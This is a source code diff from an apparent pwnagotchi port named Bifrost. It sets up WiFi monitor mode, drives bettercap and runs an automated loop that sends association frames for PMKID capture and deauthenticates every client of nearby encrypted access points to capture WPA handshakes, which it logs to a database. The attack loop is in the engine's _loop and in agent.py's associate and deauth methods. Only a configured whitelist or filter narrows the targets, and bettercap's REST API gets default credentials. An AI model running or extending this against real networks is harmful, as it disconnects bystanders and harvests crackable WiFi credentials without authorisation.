return bool(self.shared_data.config.get('bifrost_enabled', False))
def start(self):
"""Start the Bifrost engine (bettercap + agent loop)."""
if self._running:
logger.warning("Bifrost already running")
return
# Wait for any previous thread to finish before re-starting
if self._thread and self._thread.is_alive():
logger.warning("Previous Bifrost thread still running — waiting ...")
self._stop_event.set()
self._thread.join(timeout=15)
logger.info("Starting Bifrost engine ...")
self._stop_event.clear()
self._running = True
self._monitor_failed = False
self._monitor_torn_down = False
self._thread = threading.Thread(
target=self._loop, daemon=True, name="BifrostEngine"
)
self._thread.start()
def stop(self):
"""Stop the Bifrost engine gracefully.
Signals the daemon loop to exit, then waits for it to finish.
The loop's finally block handles bettercap shutdown and monitor teardown.
"""
if not self._running:
return
logger.info("Stopping Bifrost engine ...")
self._stop_event.set()
self._running = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=15)
self._thread = None
self.agent = None
# Safety net: teardown is idempotent, so this is a no-op if
# _loop()'s finally already ran it.
self._stop_bettercap()
self._teardown_monitor_mode()
logger.info("Bifrost engine stopped")
def _loop(self):
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
try:
# Install compatibility shim for pwnagotchi plugins
from bifrost import plugins as bfplugins
from bifrost.compat import install_shim
install_shim(self.shared_data, bfplugins)
# Setup monitor mode on the WiFi interface
self._setup_monitor_mode()
if self._monitor_failed:
logger.error(
"Monitor mode setup failed — Bifrost cannot operate without monitor "
"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
"https://github.com/seemoo-lab/nexmon — "
"Or use an external USB WiFi adapter with monitor mode support.")
# Teardown first (restores network services) BEFORE switching mode,
# so the orchestrator doesn't start scanning on a dead network.
self._teardown_monitor_mode()
self._running = False
# Now switch mode back to AUTO — the network should be restored.
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
try:
self.shared_data.config["bifrost_enabled"] = False
self.shared_data.config["manual_mode"] = False
self.shared_data.config["ai_mode"] = False
self.shared_data.manual_mode = False
self.shared_data.ai_mode = False
self.shared_data.invalidate_config_cache()
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
except Exception:
pass
return
# Start bettercap
self._start_bettercap()
self._stop_event.wait(3) # Give bettercap time to initialize
if self._stop_event.is_set():
return
# Create agent (pass stop_event so its threads exit cleanly)
from bifrost.agent import BifrostAgent
self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
# Load plugins
bfplugins.load(self.shared_data.config)
# Initialize agent
self.agent.start()
logger.info("Bifrost agent started — entering recon cycle")
# Main recon loop (port of do_auto_mode from pwnagotchi)
while not self._stop_event.is_set():
try:
# Full spectrum scan
self.agent.recon()
if self._stop_event.is_set():
break
# Get APs grouped by channel
channels = self.agent.get_access_points_by_channel()
# For each channel
for ch, aps in channels:
if self._stop_event.is_set():
break
self.agent.set_channel(ch)
# For each AP on this channel
for ap in aps:
if self._stop_event.is_set():
break
# Send association frame for PMKID
self.agent.associate(ap)
# Deauth all clients for full handshake
for sta in ap.get('clients', []):
if self._stop_event.is_set():
break
self.agent.deauth(ap, sta)
if not self._stop_event.is_set():
self.agent.next_epoch()
except Exception as e:
if 'wifi.interface not set' in str(e):
logger.error("WiFi interface lost: %s", e)
self._stop_event.wait(60)
if not self._stop_event.is_set():
self.agent.next_epoch()
else:
logger.error("Recon loop error: %s", e)
self._stop_event.wait(5)
except Exception as e:
logger.error("Bifrost engine fatal error: %s", e)
finally:
from bifrost import plugins as bfplugins
bfplugins.shutdown()
self._stop_bettercap()
self._teardown_monitor_mode()
self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
def _setup_monitor_mode(self):
"""Put the WiFi interface into monitor mode.
Strategy order:
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
3. iw — direct fallback for other drivers
"""
self._monitor_torn_down = False
self._nexmon_used = False
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
# If configured iface already ends with 'mon', derive the base name
if iface.endswith('mon'):
base_iface = iface[:-3] # e.g. 'wlan0mon' -> 'wlan0'
else:
base_iface = iface
# Store original interface name for teardown
self._base_iface = base_iface
self._mon_iface = iface
# Check if a monitor interface already exists
if iface != base_iface and self._iface_exists(iface):
logger.info("Monitor interface %s already exists", iface)
return
# ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
if self._is_brcmfmac(base_iface):
logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
if self._has_nexmon():
if self._setup_nexmon(base_iface, cfg):
return
# nexmon setup failed — don't try other strategies, they won't work either
self._monitor_failed = True
return
else:
logger.error(
"Broadcom brcmfmac chip requires nexmon firmware patches for "
"monitor mode. Install nexmon manually using install_nexmon.sh "
"or visit: https://github.com/seemoo-lab/nexmon")
self._monitor_failed = True
return
# ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
airmon_ok = False
try:
logger.info("Killing interfering processes ...")
subprocess.run(
['airmon-ng', 'check', 'kill'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
result = subprocess.run(
['airmon-ng', 'start', base_iface],
capture_output=True, text=True, timeout=30,
)
combined = (result.stdout + result.stderr).strip()
logger.info("airmon-ng output: %s", combined)
if 'Operation not supported' in combined or 'command failed' in combined:
logger.warning("airmon-ng failed: %s", combined)
else:
# airmon-ng may rename the interface (wlan0 -> wlan0mon)
if self._iface_exists(iface):
logger.info("Monitor mode active: %s", iface)
airmon_ok = True
elif self._iface_exists(base_iface):
logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
airmon_ok = True
if airmon_ok:
return
except FileNotFoundError:
logger.warning("airmon-ng not found, trying iw fallback ...")
except Exception as e:
logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
# ── Strategy 3: iw (direct fallback) ──────────────────────
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
result = subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
err = result.stderr.strip()
logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
self._monitor_failed = True
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
return
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Monitor mode set via iw on %s", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
except Exception as e:
logger.error("Failed to set monitor mode: %s", e)
self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
"""Enable monitor mode using nexmon (for Broadcom brcmfmac chips).
Creates a separate monitor interface (mon0) so wlan0 can potentially
remain usable for management traffic (like pwnagotchi does).
Returns True on success, False on failure.
"""
mon_iface = 'mon0'
phy = self._detect_phy(base_iface)
logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
try:
# Kill interfering services (same as pwnagotchi)
for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
subprocess.run(
['systemctl', 'stop', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Remove old mon0 if it exists
if self._iface_exists(mon_iface):
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
# Create monitor interface via iw phy
result = subprocess.run(
['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
return False
# Bring monitor interface up
subprocess.run(
['ifconfig', mon_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Enable monitor mode with radiotap headers via nexutil
result = subprocess.run(
['nexutil', '-m2'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
# Verify
verify = subprocess.run(
['nexutil', '-m'],
capture_output=True, text=True, timeout=5,
)
mode_val = verify.stdout.strip()
logger.info("nexutil -m reports: %s", mode_val)
if not self._iface_exists(mon_iface):
logger.error("Monitor interface %s not created", mon_iface)
return False
# Success — update config to use mon0
cfg['bifrost_iface'] = mon_iface
self._mon_iface = mon_iface
self._nexmon_used = True
logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
return True
except FileNotFoundError as e:
logger.error("Required tool not found: %s", e)
return False
except Exception as e:
logger.error("Nexmon setup error: %s", e)
return False
def _teardown_monitor_mode(self):
"""Restore the WiFi interface to managed mode (idempotent)."""
if self._monitor_torn_down:
return
base_iface = getattr(self, '_base_iface', None)
mon_iface = getattr(self, '_mon_iface', None)
if not base_iface:
return
self._monitor_torn_down = True
logger.info("Restoring managed mode for %s ...", base_iface)
if getattr(self, '_nexmon_used', False):
# ── Nexmon teardown ──
try:
subprocess.run(
['nexutil', '-m0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Nexmon monitor mode disabled (nexutil -m0)")
except Exception:
pass
# Remove the mon0 interface
if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
try:
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Removed monitor interface %s", mon_iface)
except Exception:
pass
else:
# ── airmon-ng / iw teardown ──
try:
iface_to_stop = mon_iface or base_iface
subprocess.run(
['airmon-ng', 'stop', iface_to_stop],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Monitor mode stopped via airmon-ng")
except FileNotFoundError:
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'managed'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Managed mode restored via iw on %s", base_iface)
except Exception as e:
logger.error("Failed to restore managed mode: %s", e)
except Exception as e:
logger.warning("airmon-ng stop failed: %s", e)
# Restart network services that were killed
restarted = False
for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
try:
subprocess.run(
['systemctl', 'start', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
)
restarted = True
except Exception:
pass
# Wait for network services to actually reconnect before handing
# control back so the orchestrator doesn't scan a dead interface.
if restarted:
logger.info("Waiting for network services to reconnect ...")
time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
"""Spawn bettercap subprocess with REST API."""
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
port = str(cfg.get('bifrost_bettercap_port', 8081))
user = cfg.get('bifrost_bettercap_user', 'user')
password = cfg.get('bifrost_bettercap_pass', 'pass')
cmd = [
'bettercap', '-iface', iface, '-no-colors',
'-eval', 'set api.rest.address %s' % host,
'-eval', 'set api.rest.port %s' % port,
'-eval', 'set api.rest.username %s' % user,
'-eval', 'set api.rest.password %s' % password,
'-eval', 'api.rest on',
]
logger.info("Starting bettercap: %s", ' '.join(cmd))
try:
self._bettercap_proc = subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
logger.info("bettercap PID: %d", self._bettercap_proc.pid)
except FileNotFoundError:
logger.error("bettercap not found! Install with: apt install bettercap")
raise
except Exception as e:
logger.error("Failed to start bettercap: %s", e)
raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return full engine status for web API."""
base = {
'enabled': self.enabled,
'running': self._running,
'monitor_failed': self._monitor_failed,
}
if self.agent and self._running:
base.update(self.agent.get_status())
else:
base.update({
'mood': 'sleeping',
'face': '(-.-) zzZ',
'voice': '',
'channel': 0,
'num_aps': 0,
'num_handshakes': 0,
'uptime': 0,
'epoch': 0,
'mode': 'auto',
'last_pwnd': '',
'reward': 0,
})
return base

568
bifrost/agent.py Normal file
View File

@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
self.shared_data = shared_data
self._config = shared_data.config
self.db = shared_data.db
self._stop_event = stop_event or threading.Event()
# Sub-systems
cfg = self._config
self.bettercap = BettercapClient(
hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
scheme='http',
port=int(cfg.get('bifrost_bettercap_port', 8081)),
username=cfg.get('bifrost_bettercap_user', 'user'),
password=cfg.get('bifrost_bettercap_pass', 'pass'),
)
self.automata = BifrostAutomata(cfg)
self.epoch = BifrostEpoch(cfg)
self.voice = BifrostVoice()
self._started_at = time.time()
self._filter = None
flt = cfg.get('bifrost_filter', '')
if flt:
try:
self._filter = re.compile(flt)
except re.error:
logger.warning("Invalid bifrost_filter regex: %s", flt)
self._current_channel = 0
self._tot_aps = 0
self._aps_on_channel = 0
self._supported_channels = list(range(1, 15))
self._access_points = []
self._last_pwnd = None
self._history = {}
self._handshakes = {}
self.mode = 'auto'
# Whitelist
self._whitelist = [
w.strip().lower() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
]
# Channels
self._channels = [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
]
# Ensure handshakes dir
hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
if hs_dir and not os.path.exists(hs_dir):
try:
os.makedirs(hs_dir, exist_ok=True)
except OSError:
pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
"""Initialize bettercap, start monitor mode, begin event polling."""
self._wait_bettercap()
self.setup_events()
self.automata.set_starting()
self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
self.start_monitor_mode()
self.start_event_polling()
self.start_session_fetcher()
self.next_epoch()
self.automata.set_ready()
self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
"""Silence noisy bettercap events."""
logger.info("connecting to %s ...", self.bettercap.url)
silence = [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
]
for tag in silence:
try:
self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
except Exception:
pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
"""Wait for monitor interface and start wifi.recon."""
iface = self._config.get('bifrost_iface', 'wlan0mon')
has_mon = False
retries = 0
while not has_mon and retries < 30 and not self._stop_event.is_set():
try:
s = self.bettercap.session()
for i in s.get('interfaces', []):
if i['name'] == iface:
logger.info("found monitor interface: %s", i['name'])
has_mon = True
break
except Exception:
pass
if not has_mon:
logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
self._stop_event.wait(2)
retries += 1
if not has_mon:
logger.warning("monitor interface %s not found after %d retries", iface, retries)
# Detect supported channels
try:
from bifrost.compat import _build_utils_shim
self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
except Exception:
self._supported_channels = list(range(1, 15))
logger.info("supported channels: %s", self._supported_channels)
self._reset_wifi_settings()
# Start wifi recon
try:
wifi_running = self._is_module_running('wifi')
if wifi_running:
self.bettercap.run('wifi.recon off; wifi.recon on')
self.bettercap.run('wifi.clear')
else:
self.bettercap.run('wifi.recon on')
except Exception as e:
err_msg = str(e)
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
logger.error(
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
"has limited monitor mode support. Use an external USB WiFi adapter "
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
"packet injection.", e)
self._log_activity('error',
'WiFi chip does not support monitor mode',
'Use an external USB WiFi adapter with monitor mode support')
else:
logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
"""Full-spectrum WiFi scan for recon_time seconds."""
recon_time = self._config.get('bifrost_personality_recon_time', 30)
max_inactive = 3
recon_mul = 2
if self.epoch.inactive_for >= max_inactive:
recon_time *= recon_mul
self._current_channel = 0
if not self._channels:
logger.debug("RECON %ds (all channels)", recon_time)
try:
self.bettercap.run('wifi.recon.channel clear')
except Exception:
pass
else:
ch_str = ','.join(map(str, self._channels))
logger.debug("RECON %ds on channels %s", recon_time, ch_str)
try:
self.bettercap.run('wifi.recon.channel %s' % ch_str)
except Exception as e:
logger.error("Error setting recon channels: %s", e)
self.automata.wait_for(recon_time, self.epoch, sleeping=False,
stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
def get_access_points(self):
"""Fetch APs from bettercap, filter whitelist and open networks."""
aps = []
try:
s = self.bettercap.session()
plugins.on("unfiltered_ap_list", s.get('wifi', {}).get('aps', []))
for ap in s.get('wifi', {}).get('aps', []):
enc = ap.get('encryption', '')
if enc == '' or enc == 'OPEN':
continue
hostname = ap.get('hostname', '').lower()
mac = ap.get('mac', '').lower()
prefix = mac[:8]
if (hostname not in self._whitelist and
mac not in self._whitelist and
prefix not in self._whitelist):
if self._filter_included(ap):
aps.append(ap)
except Exception as e:
logger.error("Error getting APs: %s", e)
aps.sort(key=lambda a: a.get('channel', 0))
self._access_points = aps
plugins.on('wifi_update', aps)
self.epoch.observe(aps, list(self.automata.peers.values()))
# Update DB with discovered networks
self._persist_networks(aps)
return aps
def get_access_points_by_channel(self):
"""Get APs grouped by channel, sorted by density."""
aps = self.get_access_points()
grouped = {}
for ap in aps:
ch = ap.get('channel', 0)
if self._channels and ch not in self._channels:
continue
grouped.setdefault(ch, []).append(ap)
return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
def associate(self, ap, throttle=0):
"""Send association frame to trigger PMKID."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_associate', True) and
self._should_interact(ap.get('mac', ''))):
try:
hostname = ap.get('hostname', ap.get('mac', '?'))
logger.info("ASSOC %s (%s) ch=%d rssi=%d",
hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
self.bettercap.run('wifi.assoc %s' % ap['mac'])
self.epoch.track(assoc=True)
self._log_activity('assoc', 'Association: %s' % hostname,
self.voice.on_assoc(hostname))
except Exception as e:
self.automata.on_error(ap.get('mac', ''), e)
plugins.on('association', ap)
if throttle > 0:
time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
"""Deauthenticate client to capture handshake."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_deauth', True) and
self._should_interact(sta.get('mac', ''))):
try:
logger.info("DEAUTH %s (%s) from %s ch=%d",
sta.get('mac', ''), sta.get('vendor', ''),
ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
self.bettercap.run('wifi.deauth %s' % sta['mac'])
self.epoch.track(deauth=True)
self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
self.voice.on_deauth(sta.get('mac', '')))
except Exception as e:
self.automata.on_error(sta.get('mac', ''), e)
plugins.on('deauthentication', ap, sta)
if throttle > 0:
time.sleep(throttle)
def set_channel(self, channel, verbose=True):
"""Hop to a specific WiFi channel."""
if self.automata.is_stale(self.epoch):
return
wait = 0
if self.epoch.did_deauth:
wait = self._config.get('bifrost_personality_hop_recon_time', 10)
elif self.epoch.did_associate:
wait = self._config.get('bifrost_personality_min_recon_time', 5)
if channel != self._current_channel:
if self._current_channel != 0 and wait > 0:
logger.debug("waiting %ds on channel %d", wait, self._current_channel)
self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
try:
self.bettercap.run('wifi.recon.channel %d' % channel)
self._current_channel = channel
self.epoch.track(hop=True)
plugins.on('channel_hop', channel)
except Exception as e:
logger.error("Error setting channel: %s", e)
def next_epoch(self):
"""Transition to next epoch — evaluate mood."""
self.automata.next_epoch(self.epoch)
# Persist epoch to DB
data = self.epoch.data()
self._persist_epoch(data)
self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
"""Start event listener in background thread.
Tries websocket first; falls back to REST polling if the
``websockets`` package is not installed.
"""
t = threading.Thread(target=self._event_poller, daemon=True, name="BifrostEvents")
t.start()
def _event_poller(self):
try:
self.bettercap.run('events.clear')
except Exception:
pass
# Probe once whether websockets is available
try:
import websockets # noqa: F401
has_ws = True
except ImportError:
has_ws = False
logger.warning("websockets package not installed — using REST event polling "
"(pip install websockets for real-time events)")
if has_ws:
self._ws_event_loop()
else:
self._rest_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
tag = ev.get('tag', '')
if tag == 'wifi.client.handshake':
# Build a fake websocket message for the existing handler
import asyncio as _aio
_loop = _aio.new_event_loop()
_loop.run_until_complete(self._on_event(json.dumps(ev)))
_loop.close()
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
async def _on_event(self, msg):
"""Handle bettercap websocket events."""
try:
jmsg = json.loads(msg)
except json.JSONDecodeError:
return
if jmsg.get('tag') == 'wifi.client.handshake':
filename = jmsg.get('data', {}).get('file', '')
sta_mac = jmsg.get('data', {}).get('station', '')
ap_mac = jmsg.get('data', {}).get('ap', '')
key = "%s -> %s" % (sta_mac, ap_mac)
if key not in self._handshakes:
self._handshakes[key] = jmsg
self._last_pwnd = ap_mac
# Find AP info
ap_name = ap_mac
try:
s = self.bettercap.session()
for ap in s.get('wifi', {}).get('aps', []):
if ap.get('mac') == ap_mac:
if ap.get('hostname') and ap['hostname'] != '<hidden>':
ap_name = ap['hostname']
break
except Exception:
pass
logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
self.epoch.track(handshake=True)
self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
self._log_activity('handshake',
'Handshake: %s' % ap_name,
self.voice.on_handshakes(1))
plugins.on('handshake', filename, ap_mac, sta_mac)
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
def _persist_networks(self, aps):
"""Upsert discovered networks to DB."""
for ap in aps:
try:
self.db.execute(
"""INSERT INTO bifrost_networks
(bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(bssid) DO UPDATE SET
essid=?, channel=?, encryption=?, rssi=?, vendor=?,
num_clients=?, last_seen=CURRENT_TIMESTAMP""",
(ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])),
ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])))
)
except Exception as e:
logger.debug("Error persisting network: %s", e)
def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
try:
self.db.execute(
"""INSERT OR IGNORE INTO bifrost_handshakes
(ap_mac, sta_mac, ap_essid, filename)
VALUES (?, ?, ?, ?)""",
(ap_mac, sta_mac, ap_name, filename)
)
except Exception as e:
logger.debug("Error persisting handshake: %s", e)
def _persist_epoch(self, data):
try:
self.db.execute(
"""INSERT INTO bifrost_epochs
(epoch_num, started_at, duration_secs, num_deauths, num_assocs,
num_handshakes, num_hops, num_missed, num_peers, mood, reward,
cpu_load, mem_usage, temperature, meta_json)
VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
(self.epoch.epoch - 1, data.get('duration_secs', 0),
data.get('num_deauths', 0), data.get('num_associations', 0),
data.get('num_handshakes', 0), data.get('num_hops', 0),
data.get('missed_interactions', 0), data.get('num_peers', 0),
self.automata.mood, data.get('reward', 0),
data.get('cpu_load', 0), data.get('mem_usage', 0),
data.get('temperature', 0), '{}')
)
except Exception as e:
logger.debug("Error persisting epoch: %s", e)
def _log_activity(self, event_type, title, details=''):
"""Log an activity event to the DB."""
self.automata.voice_text = details or title
try:
self.db.execute(
"""INSERT INTO bifrost_activity (event_type, title, details)
VALUES (?, ?, ?)""",
(event_type, title, details)
)
except Exception as e:
logger.debug("Error logging activity: %s", e)

168
bifrost/automata.py Normal file
View File

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
"""Evaluates epoch data and transitions between moods."""
def __init__(self, config):
self._config = config
self.mood = 'starting'
self.face = MOOD_FACES.get('starting', '(. .)')
self.voice_text = ''
